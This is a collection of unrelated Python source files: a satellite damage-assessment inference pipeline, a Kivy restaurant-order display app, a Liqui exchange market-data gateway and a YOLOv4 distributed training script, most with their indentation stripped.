parser.add_argument('--create_overlay_mosaic', default=False, action='store_true', help='True/False to create a mosaic out of the overlays')
parser.add_argument('--create_shapefile', default=False, action='store_true', help='True/False to create shapefile from damage overlay')
args = parser.parse_args()
make_staging_structure(args.staging_directory)
make_output_structure(args.output_directory)
print('Retrieving files...')
pre_files = get_files(args.pre_directory)
post_files = get_files(args.post_directory)
print('Re-projecting...')
# Run reprojection in parallel processes
manager = mp.Manager()
return_dict = manager.dict()
jobs = []
# Some data hacking to make it more efficient for multiprocessing
pre_files = [("pre", args.pre_crs, x) for x in pre_files]
post_files = [("post", args.post_crs, x) for x in post_files]
files = pre_files + post_files
# Launch multiprocessing jobs for reprojection
for idx, f in enumerate(files):
p = mp.Process(target=reproject_helper, args=(args, f, idx, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
reproj = [x for x in return_dict.values() if x[1] is not None]
pre_reproj = [x[1] for x in reproj if x[0] == "pre"]
post_reproj = [x[1] for x in reproj if x[0] == "post"]
print("Creating pre mosaic...")
pre_mosaic = create_mosaic(pre_reproj, Path(f"{args.output_directory}/mosaics/pre.tif"))
print("Creating post mosaic...")
post_mosaic = create_mosaic(post_reproj, Path(f"{args.output_directory}/mosaics/post.tif"))
extent = get_intersect(pre_mosaic, post_mosaic)
print('Chipping...')
pre_chips = create_chips(pre_mosaic, args.output_directory.joinpath('chips').joinpath('pre'), extent)
post_chips = create_chips(post_mosaic, args.output_directory.joinpath('chips').joinpath('post'), extent)
assert len(pre_chips) == len(post_chips)
# Loading config
config = CfgNode.load_cfg(open(args.model_config_path, 'rb'))
# Defining dataset and dataloader
pairs = []
for idx, (pre, post) in enumerate(zip(pre_chips, post_chips)):
pairs.append(Files(
pre.stem,
args.pre_directory,
args.post_directory,
args.output_directory,
pre,
post)
)
eval_dataset = XViewDataset(pairs, config, transform=build_image_transforms())
eval_dataloader = DataLoader(eval_dataset, batch_size=args.batch_size, num_workers=args.num_workers)
# Loading model
ckpt_path = args.model_weight_path
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = True
model = get_model(config)
model.load_state_dict(torch.load(ckpt_path, map_location='cpu')['state_dict'])
model.eval()
model_wrapper = ModelWrapper(model, args.is_use_gpu, config.MODEL.IS_SPLIT_LOSS)
model_wrapper.eval()
# Running inference
print('Running inference...')
results_list = run_inference(args, config, model_wrapper, eval_dataset, eval_dataloader)
# Running postprocessing
p = mp.Pool(args.n_procs)
f_p = partial(postprocess_and_write, config)
p.map(f_p, results_list)
if args.create_overlay_mosaic:
print("Creating overlay mosaic")
p = Path(args.output_directory) / "over"
overlay_files = get_files(p)
overlay_files = [x for x in overlay_files]
overlay_mosaic = create_mosaic(overlay_files, Path(f"{args.output_directory}/mosaics/overlay.tif"))
if args.create_shapefile:
print('Creating shapefile')
files = get_files(Path(args.output_directory) / 'dmg')
create_shapefile(files,
Path(args.output_directory).joinpath('shapes') / 'damage.shp',
args.destination_crs)
# Complete
print('Run complete!')
if __name__ == '__main__':
if os.name == 'nt':
        from multiprocessing import freeze_support
freeze_support()
main()
|
main.py
|
#!/usr/bin/env python
# coding=utf-8
# @Author: Manuel Rodriguez <valle>
# @Date: 02-May-2017
# @Email: valle.mrv@gmail.com
# @Last modified by: valle
# @Last modified time: 10-Mar-2018
# @License: Apache license version 2.0
import sys
import os
reload(sys)
sys.setdefaultencoding('UTF8')
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
os.chdir(BASE_DIR)
sys.path.insert(0, os.path.join(BASE_DIR, "valle_libs"))
sys.path.insert(0, os.path.join(BASE_DIR))
from kivy.app import App
from kivy.utils import platform
from kivy.uix.anchorlayout import AnchorLayout
from kivy.properties import ObjectProperty, StringProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.clock import Clock
from kivy.network.urlrequest import UrlRequest
from kivy.lib import osc
from datetime import datetime
from kivy.logger import Logger
from models.pedidos import *
import json
import threading
import time
activityport = 3011
serviceport = 3010
Builder.load_string("""
#:import ValleListView components.listview
#:import BotonIcon components.buttons
#:import * components.labels
#:import res components.resources
<PedidosWidget>:
anchor_x: 'center'
anchor_y: 'center'
scroll: _scroll
view: _listado
ScrollView:
id: _scroll
size_hint: .99, .99
BoxLayout:
orientation: 'horizontal'
spacing: 5
size_hint: None, 1
width: len(self.children) * (root.width/4)
id: _listado
<PedidoWidget>:
canvas:
Color:
rgba: 0.2, 0.2, 0.2, 1
Rectangle:
size: self.size
pos: self.pos
texto: ""
lineas: _listview
orientation: 'vertical'
spacing: 5
size_hint: 1, 1
AnchorLayout:
anchor_x: 'center'
anchor_y: 'top'
size_hint: 1, .23
Label:
font_size: 12
size_hint: 1, 1
text: root.texto
text_size: self.size
halign: 'center'
valign: 'middle'
AnchorLayout:
anchor_x: 'center'
anchor_y: 'center'
ValleListView:
size_hint: 1, 1
id: _listview
cheight: '60dp'
AnchorLayout:
anchor_x: 'center'
anchor_y: 'top'
size_hint: 1, .2
BoxLayout:
orientation: 'vertical'
size_hint: .95, .95
LabelColor:
text: root.direccion
font_size: '12dp'
AnchorLayout:
anchor_x: 'center'
anchor_y: 'top'
size_hint: 1, .2
BoxLayout:
orientation: 'horizontal'
size_hint: .95, .95
Label:
text: "Borrar comada"
text_size: self.size
halign: 'center'
valign: 'middle'
ButtonIcon:
size_hint: None, .95
width: self.height
icon: res.FA_TRASH
font_size: "6dp"
on_press: root.rm(root, root.tag)
<LineaWidget>:
contenedor: None
color: "#b9b9b9"
tag: None
des: ''
spacing: 5
orientation: 'horizontal'
LabelClicable:
font_size: "15dp"
tag: root.tag
event: root.borrar
text: root.des
bgColor: root.color
on_release: root.borrar(root)
""")
class LineaWidget(BoxLayout):
borrar = ObjectProperty(None, allowNone=True)
class PedidoWidget(BoxLayout):
rm = ObjectProperty(None, allowNone=True)
tag = ObjectProperty(None, allowNone=True)
direccion = StringProperty("No hay direccion")
class PedidosWidget(AnchorLayout):
stop = threading.Event()
def __init__(self, **kargs):
super(PedidosWidget, self).__init__(**kargs)
Logger.debug('Cagada')
self.listapedidos = []
self.modify_pedidos = []
if platform == 'android':
from android import AndroidService
service = AndroidService('TpvB3 receptor', 'running')
service.start('service started')
self.service = service
else:
import os, threading
#threading.Thread(target=os.system, args=("python ./service/main.py",)).start()
osc.init()
oscid = osc.listen(ipAddr='127.0.0.1', port=activityport)
osc.bind(oscid, self.mostrar_pedidos, '/sync_pedidos')
Clock.schedule_interval(lambda *x: osc.readQueue(oscid), 0)
self.mostrar_pedidos('ok')
#self.lock = threading.Lock()
#threading.Thread(target=self.get_pedidos).start()
#Clock.schedule_once(self.mostra_pedidos, 5)
def servido(self, root):
tag = root.tag
s = tag.servido
        s = not s
tag.servido = s
tag.save()
osc.sendMsg('/servidor_men', ['linea_servida',tag.id, tag.servido], port=serviceport)
root.color = '#beec90' if s == True else '#b9b9b9'
def rm(self, root, tag):
osc.sendMsg('/servidor_men', ['pedido_servido',tag.id], port=serviceport)
tag.delete()
tag.servido = True
if tag.id in self.listapedidos:
self.listapedidos.remove(tag.id)
self.view.remove_widget(root)
def mostrar_pedidos(self, men, *args):
print("[DEBUG ] %s" % men)
pedidos = Pedidos.filter()
for p in pedidos:
if not p.id in self.listapedidos:
self.listapedidos.append(p.id)
ls = p.lineaspedido_set.get(query="imprimible=1")
if len(ls) > 0:
pedidowidget = PedidoWidget(rm=self.rm, tag=p)
fecha = p.fecha
fs = fecha.strftime("%d/%m/%Y %H:%M")
texto = "{0}\nnum: {1}\n{2}".format(fs,
p.num_avisador,
p.para_llevar)
pedidowidget.texto = texto
pedidowidget.direccion = p.direccion
for l in ls:
linea = LineaWidget(borrar=self.servido)
if l.servido == True:
linea.color = "#beec90"
linea.tag = l
linea.contenedor = pedidowidget
linea.des = "{0} {1} {2} {3}".format(l.cant, l.tipo, l.text, l.des)
pedidowidget.lineas.add_linea(linea)
self.view.add_widget(pedidowidget)
class AppRun(App):
service = ObjectProperty()
def build(self):
self.title = "Pedidos"
self.p = PedidosWidget()
if platform == 'android':
self.service = self.p.service
return self.p
def on_stop(self):
# The Kivy event loop is about to stop, set a stop signal;
# otherwise the app window will close, but the Python process will
# keep running until all secondary threads exit.
if platform == 'android':
self.p.service.stop()
osc.sendMsg('/servidor_men', ['finalizar',], port=serviceport)
def on_pause(self):
return True
if __name__ == '__main__':
from kivy.core.window import Window
Window.clearcolor = (1,1,1,1)
AppRun().run()
|
liqui.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
from threading import Thread
import time
class ExchGwApiLiqui(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_trades_timestamp_field_name(cls):
return 'timestamp'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tid'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://api.liqui.io/api/3/depth/{0}".format(
instmt.get_instmt_code())
@classmethod
def get_trades_link(cls, instmt):
return "https://api.liqui.io/api/3/trades/{0}?limit=20".format(
(instmt.get_instmt_code()))
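    # Illustrative output (the instrument code is hypothetical):
    #
    #     get_order_book_link(instmt)  # e.g. "https://api.liqui.io/api/3/depth/eth_btc"
    #     get_trades_link(instmt)      # e.g. "https://api.liqui.io/api/3/trades/eth_btc?limit=20"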
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
raw = raw[instmt.instmt_code]
keys = list(raw.keys())
if (cls.get_bids_field_name() in keys and
cls.get_asks_field_name() in keys):
# Date time
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if len(res) > 0:
res = res[instmt.instmt_code]
for i in range(0, len(res)):
t = res[len(res) - 1 - i]
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwLiqui(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiLiqui(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Liqui'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
        Get trades worker thread
        :param instmt: Instrument
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
            except Exception as e:
                Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
                time.sleep(1)
                continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = Thread(target=partial(self.get_order_book_worker, instmt))
t2 = Thread(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Liqui'
instmt_name = 'ETHBTC'
instmt_code = 'eth_btc'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwLiqui([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
# exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
train.py
|
# -*- coding: utf-8 -*-
'''
@Time : 2020/05/06 15:07
@Author : Tianxiaomo
@File : train.py
@Notice       :
@Modification :
@Author :
@Time :
@Detail :
'''
import time
import logging
import os, sys, math
import argparse
from collections import deque
import datetime
import cv2
from tqdm import tqdm
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from torch import optim
from torch.nn import functional as F
from tensorboardX import SummaryWriter
from easydict import EasyDict as edict
from dataset import Yolo_dataset
from cfg import Cfg
from models import Yolov4
from tool.darknet2pytorch import Darknet
from tool.tv_reference.utils import collate_fn as val_collate
from tool.tv_reference.coco_utils import convert_to_coco_api
from tool.tv_reference.coco_eval import CocoEvaluator
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.distributed import DistributedSampler
import os
import json
import torch.multiprocessing as mp
def bboxes_iou(bboxes_a, bboxes_b, xyxy=True, GIoU=False, DIoU=False, CIoU=False):
"""Calculate the Intersection of Unions (IoUs) between bounding boxes.
IoU is calculated as a ratio of area of the intersection
and area of the union.
Args:
bbox_a (array): An array whose shape is :math:`(N, 4)`.
:math:`N` is the number of bounding boxes.
The dtype should be :obj:`numpy.float32`.
bbox_b (array): An array similar to :obj:`bbox_a`,
whose shape is :math:`(K, 4)`.
The dtype should be :obj:`numpy.float32`.
Returns:
array:
An array whose shape is :math:`(N, K)`. \
An element at index :math:`(n, k)` contains IoUs between \
:math:`n` th bounding box in :obj:`bbox_a` and :math:`k` th bounding \
box in :obj:`bbox_b`.
from: https://github.com/chainer/chainercv
https://github.com/ultralytics/yolov3/blob/eca5b9c1d36e4f73bf2f94e141d864f1c2739e23/utils/utils.py#L262-L282
"""
if bboxes_a.shape[1] != 4 or bboxes_b.shape[1] != 4:
raise IndexError
if xyxy:
# intersection top left
tl = torch.max(bboxes_a[:, None, :2], bboxes_b[:, :2])
# intersection bottom right
br = torch.min(bboxes_a[:, None, 2:], bboxes_b[:, 2:])
# convex (smallest enclosing box) top left and bottom right
con_tl = torch.min(bboxes_a[:, None, :2], bboxes_b[:, :2])
con_br = torch.max(bboxes_a[:, None, 2:], bboxes_b[:, 2:])
# centerpoint distance squared
rho2 = ((bboxes_a[:, None, 0] + bboxes_a[:, None, 2]) - (bboxes_b[:, 0] + bboxes_b[:, 2])) ** 2 / 4 + (
(bboxes_a[:, None, 1] + bboxes_a[:, None, 3]) - (bboxes_b[:, 1] + bboxes_b[:, 3])) ** 2 / 4
w1 = bboxes_a[:, 2] - bboxes_a[:, 0]
h1 = bboxes_a[:, 3] - bboxes_a[:, 1]
w2 = bboxes_b[:, 2] - bboxes_b[:, 0]
h2 = bboxes_b[:, 3] - bboxes_b[:, 1]
area_a = torch.prod(bboxes_a[:, 2:] - bboxes_a[:, :2], 1)
area_b = torch.prod(bboxes_b[:, 2:] - bboxes_b[:, :2], 1)
else:
# intersection top left
tl = torch.max((bboxes_a[:, None, :2] - bboxes_a[:, None, 2:] / 2),
(bboxes_b[:, :2] - bboxes_b[:, 2:] / 2))
# intersection bottom right
br = torch.min((bboxes_a[:, None, :2] + bboxes_a[:, None, 2:] / 2),
(bboxes_b[:, :2] + bboxes_b[:, 2:] / 2))
# convex (smallest enclosing box) top left and bottom right
con_tl = torch.min((bboxes_a[:, None, :2] - bboxes_a[:, None, 2:] / 2),
(bboxes_b[:, :2] - bboxes_b[:, 2:] / 2))
con_br = torch.max((bboxes_a[:, None, :2] + bboxes_a[:, None, 2:] / 2),
(bboxes_b[:, :2] + bboxes_b[:, 2:] / 2))
# centerpoint distance squared
rho2 = ((bboxes_a[:, None, :2] - bboxes_b[:, :2]) ** 2 / 4).sum(dim=-1)
w1 = bboxes_a[:, 2]
h1 = bboxes_a[:, 3]
w2 = bboxes_b[:, 2]
h2 = bboxes_b[:, 3]
area_a = torch.prod(bboxes_a[:, 2:], 1)
area_b = torch.prod(bboxes_b[:, 2:], 1)
en = (tl < br).type(tl.type()).prod(dim=2)
area_i = torch.prod(br - tl, 2) * en # * ((tl < br).all())
area_u = area_a[:, None] + area_b - area_i
iou = area_i / area_u
if GIoU or DIoU or CIoU:
if GIoU: # Generalized IoU https://arxiv.org/pdf/1902.09630.pdf
area_c = torch.prod(con_br - con_tl, 2) # convex area
return iou - (area_c - area_u) / area_c # GIoU
if DIoU or CIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
# convex diagonal squared
c2 = torch.pow(con_br - con_tl, 2).sum(dim=2) + 1e-16
if DIoU:
return iou - rho2 / c2 # DIoU
elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi ** 2) * torch.pow(torch.atan(w1 / h1).unsqueeze(1) - torch.atan(w2 / h2), 2)
with torch.no_grad():
alpha = v / (1 - iou + v)
return iou - (rho2 / c2 + v * alpha) # CIoU
return iou
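# Small sanity-check sketch for bboxes_iou (values chosen for illustration only):
#
#     a = torch.tensor([[0., 0., 2., 2.]])   # 2x2 box at the origin (xyxy)
#     b = torch.tensor([[1., 1., 3., 3.]])   # shifted 2x2 box
#     bboxes_iou(a, b)                       # -> tensor([[0.1429]])  (intersection 1 / union 7)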
class Yolo_loss(nn.Module):
def __init__(self, n_classes=80, n_anchors=3, device=None, batch=2):
super(Yolo_loss, self).__init__()
self.device = device
self.strides = [8, 16, 32]
image_size = 608
self.n_classes = n_classes
self.n_anchors = n_anchors
self.anchors = [[12, 16], [19, 36], [40, 28], [36, 75], [76, 55], [72, 146], [142, 110], [192, 243], [459, 401]]
self.anch_masks = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
self.ignore_thre = 0.5
self.masked_anchors, self.ref_anchors, self.grid_x, self.grid_y, self.anchor_w, self.anchor_h = [], [], [], [], [], []
for i in range(3):
all_anchors_grid = [(w / self.strides[i], h / self.strides[i]) for w, h in self.anchors]
masked_anchors = np.array([all_anchors_grid[j] for j in self.anch_masks[i]], dtype=np.float32)
ref_anchors = np.zeros((len(all_anchors_grid), 4), dtype=np.float32)
ref_anchors[:, 2:] = np.array(all_anchors_grid, dtype=np.float32)
ref_anchors = torch.from_numpy(ref_anchors)
# calculate pred - xywh obj cls
fsize = image_size // self.strides[i]
grid_x = torch.arange(fsize, dtype=torch.float).repeat(batch, 3, fsize, 1).to(device)
grid_y = torch.arange(fsize, dtype=torch.float).repeat(batch, 3, fsize, 1).permute(0, 1, 3, 2).to(device)
anchor_w = torch.from_numpy(masked_anchors[:, 0]).repeat(batch, fsize, fsize, 1).permute(0, 3, 1, 2).to(
device)
anchor_h = torch.from_numpy(masked_anchors[:, 1]).repeat(batch, fsize, fsize, 1).permute(0, 3, 1, 2).to(
device)
self.masked_anchors.append(masked_anchors)
self.ref_anchors.append(ref_anchors)
self.grid_x.append(grid_x)
self.grid_y.append(grid_y)
self.anchor_w.append(anchor_w)
self.anchor_h.append(anchor_h)
def build_target(self, pred, labels, batchsize, fsize, n_ch, output_id):
# target assignment
tgt_mask = torch.zeros(batchsize, self.n_anchors, fsize, fsize, 4 + self.n_classes).to(device=self.device)
obj_mask = torch.ones(batchsize, self.n_anchors, fsize, fsize).to(device=self.device)
tgt_scale = torch.zeros(batchsize, self.n_anchors, fsize, fsize, 2).to(self.device)
target = torch.zeros(batchsize, self.n_anchors, fsize, fsize, n_ch).to(self.device)
# labels = labels.cpu().data
nlabel = (labels.sum(dim=2) > 0).sum(dim=1) # number of objects
truth_x_all = (labels[:, :, 2] + labels[:, :, 0]) / (self.strides[output_id] * 2)
truth_y_all = (labels[:, :, 3] + labels[:, :, 1]) / (self.strides[output_id] * 2)
truth_w_all = (labels[:, :, 2] - labels[:, :, 0]) / self.strides[output_id]
truth_h_all = (labels[:, :, 3] - labels[:, :, 1]) / self.strides[output_id]
truth_i_all = truth_x_all.to(torch.int16).cpu().numpy()
truth_j_all = truth_y_all.to(torch.int16).cpu().numpy()
for b in range(batchsize):
n = int(nlabel[b])
if n == 0:
continue
truth_box = torch.zeros(n, 4).to(self.device)
truth_box[:n, 2] = truth_w_all[b, :n]
truth_box[:n, 3] = truth_h_all[b, :n]
truth_i = truth_i_all[b, :n]
truth_j = truth_j_all[b, :n]
# calculate iou between truth and reference anchors
anchor_ious_all = bboxes_iou(truth_box.cpu(), self.ref_anchors[output_id], CIoU=True)
# temp = bbox_iou(truth_box.cpu(), self.ref_anchors[output_id])
best_n_all = anchor_ious_all.argmax(dim=1)
best_n = best_n_all % 3
best_n_mask = ((best_n_all == self.anch_masks[output_id][0]) |
(best_n_all == self.anch_masks[output_id][1]) |
(best_n_all == self.anch_masks[output_id][2]))
if sum(best_n_mask) == 0:
continue
truth_box[:n, 0] = truth_x_all[b, :n]
truth_box[:n, 1] = truth_y_all[b, :n]
pred_ious = bboxes_iou(pred[b].contiguous().view(-1, 4), truth_box, xyxy=False)
pred_best_iou, _ = pred_ious.max(dim=1)
pred_best_iou = (pred_best_iou > self.ignore_thre)
pred_best_iou = pred_best_iou.view(pred[b].shape[:3])
# set mask to zero (ignore) if pred matches truth
obj_mask[b] = ~ pred_best_iou
for ti in range(best_n.shape[0]):
if best_n_mask[ti] == 1:
i, j = truth_i[ti], truth_j[ti]
a = best_n[ti]
obj_mask[b, a, j, i] = 1
tgt_mask[b, a, j, i, :] = 1
target[b, a, j, i, 0] = truth_x_all[b, ti] - truth_x_all[b, ti].to(torch.int16).to(torch.float)
target[b, a, j, i, 1] = truth_y_all[b, ti] - truth_y_all[b, ti].to(torch.int16).to(torch.float)
target[b, a, j, i, 2] = torch.log(
truth_w_all[b, ti] / torch.Tensor(self.masked_anchors[output_id])[best_n[ti], 0] + 1e-16)
target[b, a, j, i, 3] = torch.log(
truth_h_all[b, ti] / torch.Tensor(self.masked_anchors[output_id])[best_n[ti], 1] + 1e-16)
target[b, a, j, i, 4] = 1
target[b, a, j, i, 5 + labels[b, ti, 4].to(torch.int16).cpu().numpy()] = 1
tgt_scale[b, a, j, i, :] = torch.sqrt(2 - truth_w_all[b, ti] * truth_h_all[b, ti] / fsize / fsize)
return obj_mask, tgt_mask, tgt_scale, target
def forward(self, xin, labels=None):
loss, loss_xy, loss_wh, loss_obj, loss_cls, loss_l2 = 0, 0, 0, 0, 0, 0
for output_id, output in enumerate(xin):
batchsize = output.shape[0]
fsize = output.shape[2]
n_ch = 5 + self.n_classes
output = output.view(batchsize, self.n_anchors, n_ch, fsize, fsize)
output = output.permute(0, 1, 3, 4, 2) # .contiguous()
# logistic activation for xy, obj, cls
output[..., np.r_[:2, 4:n_ch]] = torch.sigmoid(output[..., np.r_[:2, 4:n_ch]])
pred = output[..., :4].clone()
pred[..., 0] += self.grid_x[output_id]
pred[..., 1] += self.grid_y[output_id]
pred[..., 2] = torch.exp(pred[..., 2]) * self.anchor_w[output_id]
pred[..., 3] = torch.exp(pred[..., 3]) * self.anchor_h[output_id]
obj_mask, tgt_mask, tgt_scale, target = self.build_target(pred, labels, batchsize, fsize, n_ch, output_id)
# loss calculation
output[..., 4] *= obj_mask
output[..., np.r_[0:4, 5:n_ch]] *= tgt_mask
output[..., 2:4] *= tgt_scale
target[..., 4] *= obj_mask
target[..., np.r_[0:4, 5:n_ch]] *= tgt_mask
target[..., 2:4] *= tgt_scale
loss_xy += F.binary_cross_entropy(input=output[..., :2], target=target[..., :2],
weight=tgt_scale * tgt_scale, reduction='sum')
loss_wh += F.mse_loss(input=output[..., 2:4], target=target[..., 2:4], reduction='sum') / 2
loss_obj += F.binary_cross_entropy(input=output[..., 4], target=target[..., 4], reduction='sum')
loss_cls += F.binary_cross_entropy(input=output[..., 5:], target=target[..., 5:], reduction='sum')
loss_l2 += F.mse_loss(input=output, target=target, reduction='sum')
loss = loss_xy + loss_wh + loss_obj + loss_cls
return loss, loss_xy, loss_wh, loss_obj, loss_cls, loss_l2
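# The grid/anchor buffers prepared in Yolo_loss.__init__ implement the usual
# YOLO decode: box centre = sigmoid(tx, ty) + cell offset, box size =
# anchor * exp(tw, th), in feature-map cells. A minimal standalone sketch of
# that decode (illustrative only; `raw_box` is assumed to hold pre-sigmoid
# offsets shaped like `pred` in forward(), i.e. (batch, n_anchors, fsize, fsize, 4)):
def _decode_boxes_sketch(raw_box, grid_x, grid_y, anchor_w, anchor_h):
    xy = torch.sigmoid(raw_box[..., :2])        # offset inside the cell, in (0, 1)
    cx = xy[..., 0] + grid_x                    # add the cell column index
    cy = xy[..., 1] + grid_y                    # add the cell row index
    w = torch.exp(raw_box[..., 2]) * anchor_w   # width relative to the anchor prior
    h = torch.exp(raw_box[..., 3]) * anchor_h   # height relative to the anchor prior
    return torch.stack((cx, cy, w, h), dim=-1)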
def collate(batch):
images = []
bboxes = []
for img, box in batch:
images.append([img])
bboxes.append([box])
images = np.concatenate(images, axis=0)
images = images.transpose(0, 3, 1, 2)
images = torch.from_numpy(images).div(255.0)
bboxes = np.concatenate(bboxes, axis=0)
bboxes = torch.from_numpy(bboxes)
return images, bboxes
master = json.loads(os.environ['SM_TRAINING_ENV'])['master_hostname']
os.environ['MASTER_ADDR'] = master #args.hosts[0]
os.environ['MASTER_PORT'] = '23456'
world_size = 0
rank = 0
#def train(model, device, config, epochs=5, batch_size=1, save_cp=True, log_step=20, img_scale=0.5):
def train(local_rank, config):
global world_size, rank, logging, log_dir
epochs = config.epochs
save_cp = True
log_step = 20
hosts = json.loads(os.environ['SM_HOSTS'])
world_size = len(hosts) * config.gpu
os.environ['WORLD_SIZE'] = str(world_size)
rank = hosts.index(os.environ['SM_CURRENT_HOST']) * config.gpu + local_rank
os.environ['RANK'] = str(rank)
dist.init_process_group(backend='nccl', init_method='env://', rank=rank, world_size=world_size)
torch.cuda.set_device(local_rank)
config.batch //= world_size
config.batch = max(config.batch, 1)
logging.info(f"world_size:{world_size},rank={rank},local_rank={local_rank},batch={config.batch},master={master}")
config.TRAIN_EPOCHS = config.epochs
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
logging.info(f'Using device {device}')
if config.use_darknet_cfg:
model = Darknet(config.cfgfile)
else:
model = Yolov4(config.pretrained, n_classes=config.classes)
model = model.to(device)
model = DDP(model, device_ids=[local_rank], output_device=local_rank)
model.cuda(local_rank)
train_dataset = Yolo_dataset(config.train_label, config, train=True)
val_dataset = Yolo_dataset(config.val_label, config, train=False)
n_train = len(train_dataset)
n_val = len(val_dataset)
train_sampler = DistributedSampler(train_dataset)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=config.batch // config.subdivisions,
shuffle=False,
num_workers=config.workers,
pin_memory=True,
sampler=train_sampler,
drop_last=True, collate_fn=collate)
#train_loader = DataLoader(train_dataset, batch_size=config.batch // config.subdivisions, shuffle=True,
